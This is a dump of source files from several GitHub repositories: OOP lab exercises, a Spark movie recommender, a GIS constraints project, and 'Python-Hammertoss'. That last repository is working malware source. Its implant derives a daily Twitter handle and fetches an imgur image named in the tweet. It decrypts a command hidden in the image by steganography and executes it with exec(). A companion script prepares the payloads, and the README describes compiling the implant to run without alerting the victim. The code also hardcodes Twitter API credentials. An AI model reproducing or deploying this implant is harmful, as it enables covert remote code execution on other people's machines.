Server\\n\"\nk,p,a=keygen()\ncli.send(k)\nmsg=cli.recv(4096)\ncli.send(seckey(msg,p,a))\nprint \"\\n\\tDisconnected from Server\"\nprint \"--------------------------------------------\"\ncli.close()" }, { "alpha_fraction": 0.6163636445999146, "alphanum_fraction": 0.6236363649368286, "avg_line_length": 14.742856979370117, "blob_id": "6279a9b8e1f8d3e2580bd92a89ba68b00acbe34e", "content_id": "ac1d4923b2e7da2d78247c6225a54e0b82d0065a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 550, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/stu.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\n#include \"string\"\nusing namespace std;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tvoid read(int roll_no,char name[],float marks);\n\t\tvoid print();\n};\nvoid student::read(int r,char n[],float m)\n{\n\troll_no=r;\n\tstrcpy(name,n);\n\tmarks=m;\n}\nvoid student::print()\n{\n\tcout<<\"Student details: \\n\";\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint main()\n{\n\tstudent s;\n\tint r;\n\tchar n[20];\n\tfloat m;\n\tcout<<\"Enter rollno, name and marks\\n\";\n\tcin>>r>>n>>m;\n\ts.read(r,n,m);\n\ts.print();\n}" }, { "alpha_fraction": 0.6101882457733154, "alphanum_fraction": 0.643410861492157, "avg_line_length": 13.819672584533691, "blob_id": "790d8f77c6dc355914ac90981d5a0d28bdaeac8c", "content_id": "69dd496d06beafb586bcdc772210e53b44a5bd29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 903, "license_type": "no_license", "max_line_length": 59, "num_lines": 61, "path": "/intdem.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "interface Figure\n{\n\tvoid Area();\n}\nclass Rectangle implements Figure\n{\n\tdouble dim1,dim2;\n\tRectangle(double dim1,double dim2)\n\t{\n\t\tthis.dim1=dim1;\n\t\tthis.dim2=dim2;\n\t}\n\tpublic void Area()\n\t{\n\t\tSystem.out.println(\"Area of Rectangle: \"+(dim1*dim2));\n\t}\n}\nclass Triangle implements Figure\n{\n\tdouble dim1,dim2;\n\tTriangle(double dim1,double dim2)\n\t{\n\t\tthis.dim1=dim1;\n\t\tthis.dim2=dim2;\n\t}\n\tpublic void Area()\n\t{\n\t\tSystem.out.println(\"Area of Triangle: \"+(0.5*dim1*dim2));\n\t}\n}\nclass Circle implements Figure\n{\n\tdouble dim;\n\tCircle(double dim)\n\t{\n\t\tthis.dim=dim;\n\t}\n\tpublic void Area()\n\t{\n\t\tSystem.out.println(\"Area of Circle: \"+ 3.14*dim*dim);\n\t}\n}\nclass intdem\n{\n\tpublic static void main(String args[])\n\t{\n\t\tFigure f;\n\t\tRectangle r=new Rectangle(7,6);\n\t\tr.Area();\n\t\tTriangle t=new Triangle(5,3);\n\t\tCircle c=new Circle(2);\n\t\tc.Area();\n\t\tt.Area();\n\t\tf=r;\n\t\tf.Area();\n\t\tf=t;\n\t\tf.Area();\n\t\tf=c;\n\t\tf.Area();\n\t}\n}" }, { "alpha_fraction": 0.6135265827178955, "alphanum_fraction": 0.6183574795722961, "avg_line_length": 13.821428298950195, "blob_id": "93a8dd8f53437206e1342beaab7ecc76029749bb", "content_id": "b184001c55d81bd3d0cb653263ba01c3ab2356d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 414, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/stu1.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tvoid read();\n\t\tvoid print();\n};\nvoid student::read()\n{\t\n\tcout<<\"Enter rollno, name and marks\\n\";\n\tcin>>roll_no>>name>>marks;\n}\nvoid student::print()\n{\n\tcout<<\"Student details: \\n\";\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint main()\n{\n\tstudent s;\n\ts.read();\n\ts.print();\n}" } ]
23
DKS1994/Apache-Spark-Movie-Recommendation-System
https://github.com/DKS1994/Apache-Spark-Movie-Recommendation-System
fbe4819db30653eb3025d1af69deef2a86f6cdbe
0d5807a6d37482efadc717d9433fc19788f8ae8a
a0edb050d20e9862e1e5df96d2bd1c0e5113e5d8
refs/heads/master
2021-01-10T17:57:51.073005
2016-01-28T18:13:05
2016-01-28T18:13:05
50,601,866
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6699965000152588, "alphanum_fraction": 0.7092577815055847, "avg_line_length": 16.141433715820312, "blob_id": "93d8bbac6a91fb03ddcbe676224f9f34d16ff9f9", "content_id": "ca551725c56cdbb9df4d6fe4ac55c8051392d44c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8609, "license_type": "no_license", "max_line_length": 179, "num_lines": 502, "path": "/Movies Recommender.py", "repo_name": "DKS1994/Apache-Spark-Movie-Recommendation-System", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[5]:\n\nimport sys\nimport os\n\n\n# In[6]:\n\n#It is assumed that you have folder named 'data' which has another folder within it with name 'COMPTON' which contains ratings and movies files\n\n\n# In[7]:\n\nbaseDir = os.path.join('data')\ninputPath = os.path.join('COMPTON')\n\n\n# In[8]:\n\n#Ratings file conatins data in the form=> UserID::MovieID::Rating::TimeStamp\n\n\n# In[9]:\n\nratingsFileName=os.path.join(baseDir,inputPath,'mooc-ratings.dat')\n\n\n# In[10]:\n\n#Movies file contains data in the form=> MovieID::Title::Genres\n\n\n# In[11]:\n\nmoviesFileName=os.path.join(baseDir,inputPath,'mooc-movies.dat')\n\n\n# In[12]:\n\n#Building RDD from given files\n\n\n# In[13]:\n\nnumPartitions = 2\nrawRatings = sc.textFile(ratingsFileName).repartition(2)\nrawMovies = sc.textFile(moviesFileName)\n\n\n# In[14]:\n\n#get_ratings_tuple returns ratingsRDD in the form=>UserID::MovieID::Rating\n\n\n# In[15]:\n\ndef get_ratings_tuple(entry):\n items = entry.split('::')\n return int(items[0]),int(items[1]),float(items[2])\nratingsRDD = rawRatings.map(get_ratings_tuple).cache()\n\n\n# In[16]:\n\n#get_movies_tuple returns moviesRDD in the form=>MovieID::Title\n\n\n# In[17]:\n\ndef get_movies_tuple(entry):\n items = entry.split('::')\n return int(items[0]),items[1]\nmoviesRDD = rawMovies.map(get_movies_tuple).cache()\n\n\n# In[18]:\n\n#get_average_rating returns (MovieID,(number of ratings,average of rating tuple))\n\n\n# In[19]:\n\ndef get_average_rating(IDandRatingsTuple):\n countOfRatings = len(IDandRatingsTuple[1])\n averageOfRatings = float(sum(IDandRatingsTuple[1]))/countOfRatings\n return (IDandRatingsTuple[0],(countOfRatings,averageOfRatings))\n\n\n# In[20]:\n\n#movieIDsWithRatingsRDD consists of movieID and the tuple of all ratings assigned to it\n# movieIDsWithRatingsRDD has the form => (MovieID,(Rating1,Rating2,.....))\n\n\n# In[21]:\n\nmovieIDsWithRatingsRDD = ratingsRDD.map(lambda x : (x[1],x[2])).groupByKey()\n\n\n# In[22]:\n\nIDRatingsCountAndAverage = movieIDsWithRatingsRDD.map(get_average_rating)\n\n\n# In[26]:\n\n#movieNameWithAvgRatingsRDD has the form=>(average rating,Title,number of ratings)\n\n\n# In[29]:\n\nmovieNameWithAvgRatingsRDD = (moviesRDD\n .join(IDRatingsCountAndAverage).map(lambda x:(x[1][1][1],x[1][0],x[1][1][0])))\n\n\n# In[31]:\n\n#splitting ratingsRDD in 3 RDDs.\n\n\n# In[32]:\n\ntrainingRDD , validationRDD , testRDD = ratingsRDD.randomSplit([6,2,2],seed = 0L)\n\n\n# In[33]:\n\nimport math\n\n\n# In[35]:\n\n#compute_error computes Root Mean Square Error\n\n\n# In[36]:\n\ndef compute_error(predictedRDD,actualRDD):\n predictedRatings = predictedRDD.map(lambda (x,y,z):((x,y),z))\n actualRatings = actualRDD.map(lambda (x,y,z):((x,y),z))\n \n combinedRDD = (predictedRatings.join(actualRatings)).map(lambda (x,y):(y[0]-y[1])**2)\n count = combinedRDD.count()\n summation = combinedRDD.sum()\n \n return math.sqrt(float(summation)/count)\n \n\n\n# In[37]:\n\nfrom pyspark.mllib.recommendation import ALS\n\n\n# In[39]:\n\n#validationForPredictedRDD has the form=>(UserID,MovieID)\n\n\n# In[40]:\n\nvalidationForPredictedRDD = validationRDD.map(lambda (x,y,z):(x,y))\n\n\n# In[41]:\n\nseed =5L\niterations = 5\nregularizationParameter = 0.1\nranks = [4,8,12]\nerrors = [0,0,0]\nerr = 0\ntolerance = 0.02\n\nminError = float('inf')\nbestRank =-1\nbestIteration = -1\n\n\n# In[42]:\n\n#calculating bestRank for our training model out of given ranks [4,8,12]\n\n\n# In[43]:\n\nfor rank in ranks:\n model = ALS.train(trainingRDD,rank,seed=seed,iterations=iterations,lambda_=regularizationParameter)\n predicted_ratings = model.predictAll(validationForPredictedRDD)\n \n error = compute_error(predicted_ratings,validationRDD)\n errors[err]=error\n err += 1\n if error < minError:\n minError = error\n bestRank = rank\n \n \n\n\n# In[ ]:\n\n#building best training model from bestRank obtained\n\n\n# In[49]:\n\nbestModel = ALS.train(trainingRDD,bestRank,seed=seed,iterations=iterations,lambda_=regularizationParameter)\n\n\n# In[50]:\n\n#building testForPredictingRDD for test error in prediction\n\n\n# In[51]:\n\ntestForPredictingRDD = testRDD.map(lambda (x,y,z):(x,y))\n\n\n# In[53]:\n\n#predicting ratings for testForPredictingRDD\n\n\n# In[54]:\n\nPredictingTestRDD = bestModel.predictAll(testForPredictingRDD)\n\n\n# In[56]:\n\n#Testing ERROR in the obtaied ratings and original RDD\n\n\n# In[57]:\n\ntestError = compute_error(PredictingTestRDD,testRDD)\n\n\n# In[58]:\n\nprint testError\n\n\n# In[59]:\n\n#For comparing our testError against the average rating for all movies in testRDD\n\n\n# In[60]:\n\ntestCount = testRDD.count()\ntestRDDratingsAvg = (float(testRDD.map(lambda (x,y,z):z).sum())/testCount)\n\n\n# In[61]:\n\ntestAvgRDD = testRDD.map(lambda (x,y,z):(x,y,testRDDratingsAvg))\n\n\n# In[62]:\n\ntestERR = compute_error(testAvgRDD,testRDD)\n\n\n# In[64]:\n\nprint testERR\n\n\n# In[65]:\n\n#Now predicting movies for a new user created by ourself with userID myUserID equal to 0\n\n\n# In[93]:\n\nmyUserID = 0\n\n\n# In[94]:\n\n#Giving rating to different movies by making RDD with the form same as to trainingRDD. \n#You can rate movies by adding tuple (userID,movieID,rating)\n#You can look for movies ID from moviesRDD or directly from movies.dat file.I leave this to you to figure out.\n\n\n# In[115]:\n\nmyRatedMovies = [\n (myUserID,993,4),(myUserID,983,4.5),(myUserID,789,4),(myUserID,539,3),(myUserID,1438,5),(myUserID,1195,5),(myUserID,1088,4),(myUserID,651,3),(myUserID,551,2),(myUserID,662,5)\n # The format of each line is (myUserID, movie ID, your rating)\n # For example, to give the movie \"Star Wars: Episode IV - A New Hope (1977)\" a five rating, you would add the following line:\n # (myUserID, 260, 5),\n ]\n\n\n# In[116]:\n\nmyRatedRDD = sc.parallelize(myRatedMovies)\n\n\n# In[117]:\n\n#The number of movies in our training set\n\n\n# In[118]:\n\nprint trainingRDD.count()\n\n\n# In[119]:\n\n#Adding our movies to trainingRDD\n\n\n# In[120]:\n\ntrainingSetWithMyRatings = trainingRDD.union(myRatedRDD)\n\n\n# In[121]:\n\n#The number of movies after adding to training set\n\n\n# In[122]:\n\nprint trainingSetWithMyRatings.count()\n\n\n# In[123]:\n\n#Building training model from our new training set RDD with bestRank calculated above\n\n\n# In[124]:\n\nmyRatingModel = ALS.train(trainingSetWithMyRatings,bestRank,seed=seed,iterations=iterations,lambda_=regularizationParameter)\n\n\n# In[125]:\n\n#Making predictions with our model on testRDD\n\n\n# In[126]:\n\nPredictionsOnTestRDD = myRatingModel.predictAll(testForPredictingRDD)\n\n\n# In[127]:\n\nprint PredictionsOnTestRDD.count()\n\n\n# In[128]:\n\n#Computing accuracy for our new model\n\n\n# In[129]:\n\naccuracyIs = compute_error(PredictionsOnTestRDD,testRDD)\n\n\n# In[130]:\n\nprint accuracyIs\n\n\n# In[131]:\n\n#Predicting our ratings for unrated movies by us!\n#myRatedMoviesWithoutRatings has the form=>(UserID,MovieID)\n\n\n# In[132]:\n\nmyRatedMovies = sc.parallelize(myRatedMovies).map(lambda (x,y,z):(x,y))\n\n\n# In[133]:\n\nprint myRatedMovies.take(3)\n\n\n# In[135]:\n\n#Obtaining movies which we didn't rated in the form=>(UserID,MovieID)\n\n\n# In[136]:\n\nmyUnratedMovies = moviesRDD.map(lambda (x,y):(myUserID,x)).subtract(myRatedMovies)\n\n\n# In[137]:\n\nprint moviesRDD.count()\n\n\n# In[138]:\n\nprint myUnratedMovies.count()\n\n\n# In[140]:\n\n#Predicting ratings for movies we didn't rate by our model myRatingModel\n\n\n# In[141]:\n\npredictionsForUnratedMovies = myRatingModel.predictAll(myUnratedMovies)\n\n\n# In[143]:\n\n#PredictedRDD has the form=>(MovieID,predicted_Ratings)\n\n\n# In[144]:\n\npredictedRDD = predictionsForUnratedMovies.map(lambda (x,y,z):(y,z))\n\n\n# In[72]:\n\nprint IDRatingsCountAndAverage.take(3)\n\n\n# In[146]:\n\n#movieCounts has the form=>(MovieID,number_of_ratings)\n\n\n# In[147]:\n\nmovieCounts = IDRatingsCountAndAverage.map(lambda (x,y):(x,y[0]))\n\n\n# In[148]:\n\nprint movieCounts.take(3)\n\n\n# In[149]:\n\n#movieCountsWithPredictedRDD has the form=>(MovieID,(number_of_ratings,predicted_ratings))\n\n\n# In[150]:\n\nmovieCountsWithPredictedRDD = movieCounts.join(predictedRDD)\n\n\n# In[151]:\n\n#movieNameCountPredictedRatings has the form=>(MovieID,(Title,(number_of_ratings,predicted_ratings)))\n\n\n# In[152]:\n\nmovieNameCountPredictedRatings = moviesRDD.join(movieCountsWithPredictedRDD)\n\n\n# In[154]:\n\n#predictedRatingsWithName has the form=>(predicted_Ratings,Title,number_of_ratings)\n\n\n# In[155]:\n\npredictedRatingsWithName = movieNameCountPredictedRatings.map(lambda x:(x[1][1][1],x[1][0],x[1][1][0]))\n\n\n# In[158]:\n\n#For better recommendation we take movies which have more than 75 ratings by other users.\n\n\n# In[159]:\n\nrecommendedMoviesFromHighestRating = predictedRatingsWithName.filter(lambda x : x[2]>75)\n\n\n# In[160]:\n\n#Top ten recommended movie for ourself!!!\n\n\n# In[163]:\n\nprint recommendedMoviesFromHighestRating.sortBy(lambda x:-x[0]).take(10)\n\n\n# In[ ]:\n\n\n\n" } ]
1
popdogsec/Python-Hammertoss
https://github.com/popdogsec/Python-Hammertoss
7b97c40240146d58d009419ba9808c8d6939232c
c2906afc0b22b41a045b420022a1ac69a57d5ef8
3dde9119757bb78d717b8c73140e283e9f1021c3
refs/heads/master
2022-12-31T14:16:38.338924
2020-10-02T04:29:43
2020-10-02T04:29:43
300,312,963
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6024250388145447, "alphanum_fraction": 0.6167836785316467, "avg_line_length": 23.453125, "blob_id": "02c5eafd0018c52e43a1e923c843c941fe428b58", "content_id": "a07497493281e8a4af0789a2cb83f058b4a347a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3134, "license_type": "no_license", "max_line_length": 78, "num_lines": 128, "path": "/HAMMERTOSS.py", "repo_name": "popdogsec/Python-Hammertoss", "src_encoding": "UTF-8", "text": "import tweepy\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport urllib\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256\nfrom stegano import lsbset\nfrom stegano.lsbset import generators\nimport requests\n\ndef handle_generator():\n date_datetype = datetime.datetime.now()\n\n month = int(str(date_datetype)[5:7])\n day = int(str(date_datetype)[8:10])\n year = int(str(date_datetype)[0:4])\n\n position = (day + month)*3\n if position > 100:\n position = position - 100\n\n prestring = str(6*month) + str(3*day)\n\n poststring = str(int((2*year)/3))\n\n poslength = len(str(position))\n offset = poslength + 2\n\n page = urlopen('https://www.familyeducation.com/baby-names/top-names/boy')\n soup = BeautifulSoup(page, 'html.parser')\n\n for ul in soup.find_all('ul', class_='static-top-names part1'):\n line = ul.text\n\n start = line.find(str(position)+'.')\n\n if start < 0:\n for ul in soup.find_all('ul', class_='static-top-names part2'):\n line = ul.text\n\n start = line.find(str(position)+'.')\n\n start = start+offset\n end = line.find('\\n', start)\n name = (line[start:end])\n\n handle = prestring + name + poststring\n\n return handle\n\ndef twitter_checker(handle):\n conn = requests.head(\"https://twitter.com/\" + handle)\n\n if conn.status_code == 200:\n return True\n else:\n return False\n\ndef tweet_grabber(handle):\n auth = tweepy.AppAuthHandler('l6YWEnCAUpbymznvHL7n5sz7F', 'VpYDAkRmLw8x2zerOGqBdVIhlrPpHta9wIySaQxWLQ3Dkp6YmY')\n api = tweepy.API(auth)\n tweet = api.user_timeline(id=handle, count='1')\n for x in tweet:\n tweet_text = x.text\n return tweet_text\n\n\ndef parser(tweet):\n tweet = tweet + \" \"\n key = ''\n url = ''\n\n for i in range(0, len(tweet)):\n if tweet[i] == ' ':\n continue\n elif tweet[i - 1] == ' ' and tweet[i + 1] == ' ':\n url = url + tweet[i]\n else:\n key = key + tweet[i]\n\n return key, url\n\ndef image_fetcher(file_name):\n base_url = \"https://i.imgur.com/\"\n full_file_name = file_name + '.png'\n image_url = base_url + full_file_name\n urllib.request.urlretrieve(image_url, full_file_name)\n return\n\ndef decrypter(key, fileprefix):\n\n filename = fileprefix + \".png\"\n\n source = lsbset.reveal(filename, generators.eratosthenes())\n\n key = key.encode(\"ascii\")\n\n source = base64.b64decode(source.encode(\"latin-1\"))\n key = SHA256.new(key).digest()\n IV = source[:AES.block_size]\n decryptor = AES.new(key, AES.MODE_CBC, IV)\n data = decryptor.decrypt(source[AES.block_size:])\n padding = data[-1]\n data = data[:-padding]\n\n return (data.decode('ascii'))\n\ndef execution(command):\n exec(command)\n return True\n\nexec_check = False\nhandle = \"\"\nwhile 1:\n if handle != handle_generator():\n exec_check = False\n handle = handle_generator()\n if exec_check == True:\n continue\n if twitter_checker(handle) == False:\n continue\n tweet = tweet_grabber(handle)\n key, url = parser(tweet)\n image_fetcher(url)\n command = decrypter(key, url)\n exec_check = execution(command)\n\n\n\n\n" }, { "alpha_fraction": 0.8061538338661194, "alphanum_fraction": 0.8102564215660095, "avg_line_length": 107.22222137451172, "blob_id": "75144883ef88b8ab92be232df76dfe8af535ec49", "content_id": "10c88ee28c05d4ff20caaaeb595931626c66e09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 975, "license_type": "no_license", "max_line_length": 419, "num_lines": 9, "path": "/README.md", "repo_name": "popdogsec/Python-Hammertoss", "src_encoding": "UTF-8", "text": "# Python-Hammertoss\nThis is a piece of command and control software that draws inspiration from the HAMMERTOSS malware utilized by APT29. It is written in Python and includes 2 scripts, one to aid the attacker in deploying the commands and the other to control the remote victim. The script to be implanted can be compiled with auto-py-to-exe and when compiled in a windowless fashion does not alert the victim that it has begun operating.\n\nThe heart of this project was to implement a way to deploy commands stealthily over normal web traffic by utilizing steganography. The fetch process for instructions by the victim machine is nothing more than requesting a few social media pages, making it very easy to go unnoticed.\n\nIt should go without saying that this shouldn't be used with out the targets consent. Under no circumstances should this be used in any unlawful way, this project was for educational purposes only.\n\nDEMO:\nhttps://www.youtube.com/watch?v=PQdnS4abGFk\n\n" }, { "alpha_fraction": 0.6910678148269653, "alphanum_fraction": 0.7048354744911194, "avg_line_length": 31.714284896850586, "blob_id": "2099ec9022b4965069c39d5d0fe329f3bb7027dd", "content_id": "6ff50332845f11bda8dab322ddc43bf15f49b28c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 192, "num_lines": 91, "path": "/Attacker_Prep.py", "repo_name": "popdogsec/Python-Hammertoss", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256\nfrom Crypto import Random\nfrom stegano import lsbset\nfrom stegano.lsbset import generators\nimport random\nimport string\n\ndate = input(\"Enter a date in the following format: mm-dd-yyyy: \\n\")\nday = int(date[3:5])\nmonth = int(date[0:2])\nyear = int(date[6:10])\n\n\nposition = (day + month) * 3\nif position > 100:\n position = position - 100\n\nprestring = str(6 * month) + str(3 * day)\n\npoststring = str(int((2 * year) / 3))\n\nposlength = len(str(position))\noffset = poslength + 2\n\npage = urlopen('https://www.familyeducation.com/baby-names/top-names/boy')\nsoup = BeautifulSoup(page, 'html.parser')\n\nfor ul in soup.find_all('ul', class_='static-top-names part1'):\n line = ul.text\n\nstart = line.find(str(position) + '.')\n\nif start < 0:\n for ul in soup.find_all('ul', class_='static-top-names part2'):\n line = ul.text\n\nstart = line.find(str(position) + '.')\n\nstart = start + offset\nend = line.find('\\n', start)\nname = (line[start:end])\n\nhandle = prestring + name + poststring\nprint(handle)\nwait = input(\"Please create twitter account with the handle presented\")\n\nfile_name = input(\"Please enter the filename without file extension, please note that only PNG images are accepted and should be well below 5MB in order for imgur to keep it in PNG format:\\n\")\noutput_file_name = input(\"Please enter the desired output filename without file extension:\\n\")\nno_lines_str = input(\"Please enter the number of lines of python code you wish to inject:\\n\")\nno_lines = int(no_lines_str)\nsource = \"\"\"\"\"\"\nprint(\"Please enter each line of code\")\nfor x in range(no_lines):\n source += input() + \"\\n\"\nsource = source.encode('ascii')\ncharacter_selection = string.ascii_letters + string.digits\nkey = ''.join(random.choice(character_selection) for i in range(10))\ndecoded_key = key\nkey = key.encode('ascii')\n\nkey = SHA256.new(key).digest()\nIV = Random.new().read(AES.block_size)\nencryptor = AES.new(key, AES.MODE_CBC, IV)\npadding = AES.block_size - len(source) % AES.block_size\nsource += bytes([padding]) * padding\ndata = IV + encryptor.encrypt(source)\ndata_encrypted = base64.b64encode(data).decode(\"latin-1\")\n\nsecret_image = lsbset.hide(file_name + \".png\", data_encrypted, generators.eratosthenes())\nsecret_image.save(output_file_name + \".png\")\n\nimgur_link = input(\"Please upload the output file to imgur and enter its extension here: \\n\")\nimgur_link_length = len(imgur_link)\nmiddle = imgur_link_length\n\ntweet_text=\"\"\n\nfor x in range(imgur_link_length):\n if x == 3:\n tweet_text = tweet_text + decoded_key + \" \"\n elif x == 6:\n tweet_text = tweet_text + imgur_link[x]\n continue\n tweet_text = tweet_text + imgur_link[x] + \" \"\nprint(\"Please tweet the string shown below, the code will be executed on the day indictated \\n\")\nprint(\"Please also make sure the twitter url is the same as the handle generated\")\nprint(tweet_text)\n\n" } ]
3
smacken/constraintsmap
https://github.com/smacken/constraintsmap
db425ad65d0066bb3a9812fe08eaed4d2479248d
cf4a6fec3f68ce6da5c0296d7d35190799ad6134
27c06efbe057703aba0b0e9b93c1c174bf1b4e93
refs/heads/master
2020-12-19T10:52:37.370542
2020-02-02T01:26:15
2020-02-02T01:26:15
235,712,132
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6116504669189453, "alphanum_fraction": 0.6145631074905396, "avg_line_length": 24.121952056884766, "blob_id": "609a1b2ab0d3a7bc2f8eca524075cc933cb4eaad", "content_id": "ab54a8057be456680d6642d34aaf62c1d8865e2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 59, "num_lines": 41, "path": "/constraintsmap/constraint/operation.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom functools import partial\n\n\nclass Operation:\n # Add\n def __init__(self):\n self.name = 'add'\n self.execute_op = partial(np.add)\n\n def execute(self, img_array, constraint_array):\n return self.execute_op(constraint_array, img_array)\n\n\nclass SubtractOperation(Operation):\n def __init__(self):\n self.name = 'subtract'\n self.execute_op = partial(np.subtract)\n super(SubtractOperation, self).__init__()\n\n\nclass MinOperation(Operation):\n # Floor\n def __init__(self, min=0):\n self.min = min\n self.execute_op = partial(np.clip, min=min)\n super(MinOperation, self).__init__()\n\n\nclass MaxOperation(Operation):\n # ceiling\n def __init__(self, max=0):\n self.max = max\n self.execute_op = partial(np.clip, max=max)\n super(MaxOperation, self).__init__()\n\n\nclass RoundOperation(Operation):\n def __init__(self):\n self.execute_op = partial(np.around, decimals=2)\n super(RoundOperation, self).__init__()\n" }, { "alpha_fraction": 0.46368715167045593, "alphanum_fraction": 0.6815642714500427, "avg_line_length": 14.565217018127441, "blob_id": "e5addc962205b1a53ebcb73584df9911cc2f04d2", "content_id": "0ba7258409eb62e3b97965c9bf59b26a46af96d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 358, "license_type": "no_license", "max_line_length": 25, "num_lines": 23, "path": "/requirements.txt", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "atomicwrites==1.3.0\nattrs==19.3.0\ncertifi==2019.11.28\ncolorama==0.4.3\nimageio==2.6.1\nimportlib-metadata==1.5.0\njsons==1.1.1\nmccabe==0.6.1\nmore-itertools==8.2.0\nnumpy==1.17.5\nolefile==0.46\npackaging==20.1\nPillow==7.0.0\npluggy==0.13.1\npy==1.8.1\npyparsing==2.4.6\npytest==5.3.5\nrope==0.14.0\nsix==1.14.0\ntypish==1.3.1\nwcwidth==0.1.8\nwincertstore==0.2\nzipp==2.1.0\n" }, { "alpha_fraction": 0.6852589845657349, "alphanum_fraction": 0.6852589845657349, "avg_line_length": 35, "blob_id": "1ad664a1268fbcb03a05336971bf4fa3e34a249b", "content_id": "9e00e6ca3eab6765cb1341c8455587a0e8b7a789", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 251, "license_type": "no_license", "max_line_length": 79, "num_lines": 7, "path": "/constraintsmap/__main__.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from constraintsmap.common.config import read_config, write_output, read_layers\n\nif __name__ == '__main__':\n config = read_config()\n img_array = read_layers()\n if config.output_location:\n write_output(img_array, config.output_location)" }, { "alpha_fraction": 0.632478654384613, "alphanum_fraction": 0.6373626589775085, "avg_line_length": 29.33333396911621, "blob_id": "b89fb10c2a863cbf5d866470d25c9f493c9cb35c", "content_id": "dd73bc343a522f996e5ad0a310d23fe96362c5a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1638, "license_type": "no_license", "max_line_length": 98, "num_lines": 54, "path": "/constraintsmap/geo/buffer.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom enum import Enum\nimport fiona\nfrom shapely.geometry import shape, CAP_STYLE\nfrom constraintsmap.constraint.constraints import Constraint, Operation\nfrom .raster import to_raster_array\n\n\nclass BufferEnd(Enum):\n ROUND = 1\n FLAT = 2\n SQUARE = 3\n\n\ncap_style = {\n BufferEnd.ROUND: CAP_STYLE.round,\n BufferEnd.FLAT: CAP_STYLE.flat,\n BufferEnd.SQUARE: CAP_STYLE.square\n}\n\n''' Buffer constraint example json\n{\n \"id\":\"\",\n \"name\": \"\",\n \"sort_order\": 1,\n \"image\": \"\",\n \"weight\": 1,\n \"operation\": \"Add\",\n \"operation_props\": {}\n}'''\n\n\nclass BufferConstraint(Constraint):\n ''' Create a buffered constraint around a vector '''\n\n @classmethod\n def init_create_geometry(shp_file, buffer_size, buffer_end=BufferEnd.ROUND):\n ''' convert the shape file to a geometry object '''\n with fiona.open(shp_file) as input_shp:\n shp = input_shp.next()\n shp_geo = shape(shp['geometry'])\n buffer_geo = shp_geo.buffer(buffer_size, cap_style=cap_style[buffer_end.lower()])\n return buffer_geo\n\n def __init__(self, shp_file, buffer_size, buffer_end=BufferEnd.ROUND, weight=1, sort_order=0):\n self.constraint_op = Operation()\n self.weight = weight\n self.sort_order = sort_order\n geometry = BufferConstraint.init_create_geometry(shp_file, buffer_size, buffer_end)\n raster = to_raster_array(geometry)\n raster[raster > 0] = weight\n self.img_array = raster\n super(BufferConstraint, self).__init__()\n" }, { "alpha_fraction": 0.5397923588752747, "alphanum_fraction": 0.5513263940811157, "avg_line_length": 29.964284896850586, "blob_id": "293fa689b7cb5373d222c5c062d273d30cfa870c", "content_id": "eadad9f226739cd9162471a6f8eaa20d05a4f479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 62, "num_lines": 28, "path": "/constraintsmap/geo/raster.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import rasterio\nfrom rasterio.features import rasterize\nfrom rasterio.transform import IDENTITY\nimport numpy as np\n\n\ndef to_raster(geometry, rows, cols, out_file='test.tif'):\n ''' vector geometry to raster '''\n with rasterio.Env():\n result = rasterize([geometry], out_shape=(rows, cols))\n with rasterio.open(\n \"test.tif\",\n 'w',\n driver='GTiff',\n width=cols,\n height=rows,\n count=1,\n dtype=np.uint8,\n nodata=0,\n transform=IDENTITY,\n crs={'init': \"EPSG:4326\"}) as out:\n out.write(result.astype(np.uint8), indexes=1)\n\n\ndef to_raster_array(geometry, rows, cols):\n with rasterio.Env():\n result = rasterize([geometry], out_shape=(rows, cols))\n return result.astype(np.uint8)\n" }, { "alpha_fraction": 0.6728280782699585, "alphanum_fraction": 0.6765249371528625, "avg_line_length": 27.473684310913086, 